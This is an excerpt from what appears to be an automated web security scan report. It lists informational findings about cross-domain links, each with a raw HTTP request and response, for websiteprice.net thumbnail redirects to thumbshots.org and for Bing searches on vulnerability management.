<div><a target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=1794248&afsid=1" style="font-weight:bold;font-family:Arial;font-size:13px;">Your Ad Here</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...
</a>.&nbsp;This site uses <a href="http://www.thumbshots.com" target="_blank" title="This site uses Thumbshots previews" rel="nofollow">Thumbshots previews</a>.&nbsp;<a href="http://privacypolicy.cz" title="Informace o ochran.. osobn..ch ..daj.." rel="nofollow">PrivacyPolicy.cz</a>
...[SNIP]...
23.42. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=heavenecom.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 183
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:29 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://heavenecom.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:29 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://heavenecom.com">here</a>.</body>
23.43. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=www.ebay.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 181
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:35 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://www.ebay.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:35 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://www.ebay.com">here</a>.</body>
23.44. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=segurosautobaratos.info HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 192
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:29 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://segurosautobaratos.info
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:29 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://segurosautobaratos.info">here</a>.</body>
23.45. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=www.febadesign.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 187
Content-Type: text/html
Expires: Mon, 02 May 2011 02:28:45 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://www.febadesign.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:29:45 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://www.febadesign.com">here</a>.</body>
23.46. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=www.austininsuranceguy.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 195
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:35 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://www.austininsuranceguy.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:35 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://www.austininsuranceguy.com">here</a>.</body>
23.47. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=www.gaychatsites.org HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 189
Content-Type: text/html
Expires: Mon, 02 May 2011 02:28:45 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://www.gaychatsites.org
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:29:44 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://www.gaychatsites.org">here</a>.</body>
23.48. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=onlinemicrofiche.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 189
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:12 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://onlinemicrofiche.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:12 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://onlinemicrofiche.com">here</a>.</body>
23.49. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=DUJUGAAD.COM HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 181
Content-Type: text/html
Expires: Mon, 02 May 2011 02:28:46 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://DUJUGAAD.COM
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:29:46 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://DUJUGAAD.COM">here</a>.</body>
23.50. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=www.no14u.bz HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 181
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:37 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://www.no14u.bz
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:36 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://www.no14u.bz">here</a>.</body>
23.51. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=bollywoodswimsuit.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 190
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:30 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://bollywoodswimsuit.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:30 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://bollywoodswimsuit.com">here</a>.</body>
23.52. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=www.howtoimprovecommunicationskills.net HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 208
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:32 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://www.howtoimprovecommunicationskills.net
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:32 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://www.howtoimprovecommunicationskills.net">here</a>.
...[SNIP]...
23.53. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=forexnirvana.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 185
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:40 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://forexnirvana.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:39 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://forexnirvana.com">here</a>.</body>
23.54. http://websiteprice.net/thumb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /thumb/?url_pic=williger.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 181
Content-Type: text/html
Expires: Mon, 02 May 2011 02:28:45 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://williger.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:29:44 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://williger.com">here</a>.</body>
23.55. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=vulnerability+management&go=&form=QBLH&qs=n&sk=&sc=8-0 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903&bIm=926; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4v-pZZqp5PXPxPr2jYxibkwwnB-22O5wIuL9Rzhh78fqUZESO-SNAN1I0p1RZh9VzMKmHl3T_uqiCOJ5FNzwIPuGT5pPBglXL7vsTpG3rmBi8JPX-kGW7cmavEn8vLA8ZUpDfgXYfYMzbr2_h_RClpMCw5bbyCsdCJ-ZAvL8O210BJOjVSygfjXf7m9NrUvzuY_8Hk0eCy2RfmsNjjtsHfYlbjsqqMmQfQuSowlRNdr8M1VAlMMdO-vpb2zhIfHpI866llWxAmY3M9V1EGQfR9Js8RDB7fndDI9tUiQv3sCRfiAXJX94SMuOw" onmousedown="return si_T('&amp;ID=FD,58.1,Ads')">AT&amp;T... Official Site</a>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vlfimJWHOSoAG3PfwIh_kJRdllL3F5-o10FPT47q_IWBjrLiueJBDF0U5Dwzq7Y6YfLDJpKC4aJkPg0-hN_0iOcr6o2VXRw93vLwE4JgUrgtSouES4BG05tmlYaeWNIB-FrOo2zqN30arps-BmWfevhnAgRBhd2bQ7zCGpjlfyecT0H8nxj98iGp61_TmM6YA_SkkOpef7dME8BPU_6EHXj8nbGt5hYNuj5Kt5DdAZ6kyXNuYJJTw5rUd00d2p8z9RCFd-9LpGJrjOiEvlhyNEf6ZuSftbgFELTnpFC-ug_c1VAlMa4CLF5Vg2fbAn9ODACF2xxAmY3M9WLROFrG9IPaITglXKXQUhGEMFSUJHZKNqN_vjrCmpcs" onmousedown="return si_T('&amp;ID=FD,60.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://en.wikipedia.org/wiki/Vulnerability_management" onmousedown="return si_T('&amp;ID=SERP,5071.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Vulnerability_management#Vulnerability_Management_Programs" onmousedown="return si_T('&amp;ID=SERP,5056.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Vulnerability_management#Vulnerability_Management_for_Applications_Versus_Hosts_and_Infrastructure" onmousedown="return si_T('&amp;ID=SERP,5057.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Vulnerability_management#Managing_Known_Vulnerabilities_Versus_Unknown_Vulnerabilities" onmousedown="return si_T('&amp;ID=SERP,5058.1')"><strong>
...[SNIP]...
<h3><a href="http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794" onmousedown="return si_T('&amp;ID=SERP,5091.1')">eEye to Showcase IT Security Solutions that Simplify <strong>
...[SNIP]...
<h3><a href="http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf" onmousedown="return si_T('&amp;ID=SERP,5109.1')">Creating a Patch and <strong>
...[SNIP]...
<div><a href="http://www.siliconrepublic.com/new-media/item/21548-dutch-are-biggest-twitter/" onmousedown="return si_T('&amp;ID=SERP,5305.1')"><img height="80" id="fdemb_0" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAEALAAAAAABAAEAAAIBTAA7" title="Dutch are biggest Twitter, LinkedIn users - Silicon Republic" width="80" />
...[SNIP]...
<h5><a href="http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/" onmousedown="return si_T('&amp;ID=SERP,5310.1')">The Netherlands #1 Real Estate Company Selects OUTSCAN for <strong>
...[SNIP]...
<h5><a href="http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php" onmousedown="return si_T('&amp;ID=SERP,5313.1')">The Netherlands #1 Real Estate Website Relies on OUTSCAN for <strong>
...[SNIP]...
<h5><a href="http://insurancenewsnet.com/article.aspx?id=257992" onmousedown="return si_T('&amp;ID=SERP,5316.1')">eEye to Showcase IT Security Solutions that Simplify <strong>
...[SNIP]...
<h3><a href="http://www.cnbc.com/id/42746847/" onmousedown="return si_T('&amp;ID=SERP,5130.1')">Rapid7 Receives Highest Possible Rating of 'Strong Positive' in ...</a>
...[SNIP]...
<h3><a href="http://www.qualys.com/products/qg_suite/vulnerability_management/" onmousedown="return si_T('&amp;ID=SERP,5149.1')">QualysGuard&#174; <strong>
...[SNIP]...
<h3><a href="http://www.gartner.com/DisplayDocument?doc_cd=127481" onmousedown="return si_T('&amp;ID=SERP,5167.1')">Improve IT Security With <strong>
...[SNIP]...
<h3><a href="http://www.itworld.com/security/154195/vulnerability-management-not-just-scanning-known-vulnerabilities" onmousedown="return si_T('&amp;ID=SERP,5186.1')"><strong>
...[SNIP]...
<h3><a href="http://www.rapid7.com/" onmousedown="return si_T('&amp;ID=SERP,5240.1')"><strong>
...[SNIP]...
<h3><a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1719" onmousedown="return si_T('&amp;ID=SERP,5263.1')">National <strong>
...[SNIP]...
<h3><a href="http://www.qualys.com/solutions/vulnerability_management/" onmousedown="return si_T('&amp;ID=SERP,5281.1')"><strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4v-pZZqp5PXPxPr2jYxibkwwnB-22O5wIuL9Rzhh78fqUZESO-SNAN1I0p1RZh9VzMKmHl3T_uqiCOJ5FNzwIPuGT5pPBglXL7vsTpG3rmBi8JPX-kGW7cmavEn8vLA8ZUpDfgXYfYMzbr2_h_RClpMCw5bbyCsdCJ-ZAvL8O210BJOjVSygfjXf7m9NrUvzuY_8Hk0eCy2RfmsNjjtsHfYlbjsqqMmQfQuSowlRNdr8M1VAlMMdO-vpb2zhIfHpI866llWxAmY3M9V1EGQfR9Js8RDB7fndDI9tUiQv3sCRfiAXJX94SMuOw" onmousedown="return si_T('&amp;ID=FD,63.1,Ads')">AT&amp;T... Official Site</a>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vlfimJWHOSoAG3PfwIh_kJRdllL3F5-o10FPT47q_IWBjrLiueJBDF0U5Dwzq7Y6YfLDJpKC4aJkPg0-hN_0iOcr6o2VXRw93vLwE4JgUrgtSouES4BG05tmlYaeWNIB-FrOo2zqN30arps-BmWfevhnAgRBhd2bQ7zCGpjlfyecT0H8nxj98iGp61_TmM6YA_SkkOpef7dME8BPU_6EHXj8nbGt5hYNuj5Kt5DdAZ6kyXNuYJJTw5rUd00d2p8z9RCFd-9LpGJrjOiEvlhyNEf6ZuSftbgFELTnpFC-ug_c1VAlMa4CLF5Vg2fbAn9ODACF2xxAmY3M9WLROFrG9IPaITglXKXQUhGEMFSUJHZKNqN_vjrCmpcs" onmousedown="return si_T('&amp;ID=FD,65.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://1188110.r.msn.com/?ld=4vCHtS_uXEIeo96a3p5ur8EHeK6E2UMMS2W7lvVVqf9k_6OyA1uLOEc_RSovzlSGele_i8oUpTWlxEUal5sKN9XYJRDr8lz8qXyXacB1AVgOENi0_2LjiZcitAhkh4HVfKTfqvGUtT94zc2jM8j-rDjWLK16p15xd37HHeDm02fbhVeYQ2CGNEi2Z-ffIbpb6xdrbLavs7VWl2mJJwMjhvkWqxfQWRvim-AcNJSZ9Dh8LMan_Uhk2ZsYy-QLnVMcZq1wMDg93SjKPG4Pm2PWtPCh8cigXR6sAjkjYXAw9ac5WptSe_2v2xtGp8NowTatUrNVQJTAqhy0D1_1_R0wgjnvJybmAQJmNzPVg9TJ9UUnEt0DGnsIXLqHj2iT1ux4t3VcXvEw0z3qTK" onmousedown="return si_T('&amp;ID=FD,69.1,Ads')">Hiring Immediately</a>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&amp;ID=FD,67.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,127.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,129.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,131.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,133.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,135.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=vulnerability+management&amp;P3=cfcache&amp;P4=QBLH&amp;P5=B506C07761D7465D924574124E3C14DF&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=http%3a%2f%2fwww.bing.com%2f&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dvulnerability+management%26go%3d%26qs%3dn%26sk%3d%26sc%3d8-0%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,137.1')">Tell us what you think</a>
...[SNIP]...
23.56. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=outscan&go=&form=QBRE&qs=n&sk= HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=vulnerability+management&go=&form=QBLH&qs=n&sk=&sc=8-0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; RMS=F=OgAg&A=SAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=987&CH=887&bIm=926&hIm=688

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:33:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 32929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://www.outpost24.com/products-outscan.html" onmousedown="return si_T('&amp;ID=SERP,5057.1')"><strong>
...[SNIP]...
<h3><a href="http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/" onmousedown="return si_T('&amp;ID=SERP,5075.1')">The Netherlands #1 Real Estate Company Selects <strong>
...[SNIP]...
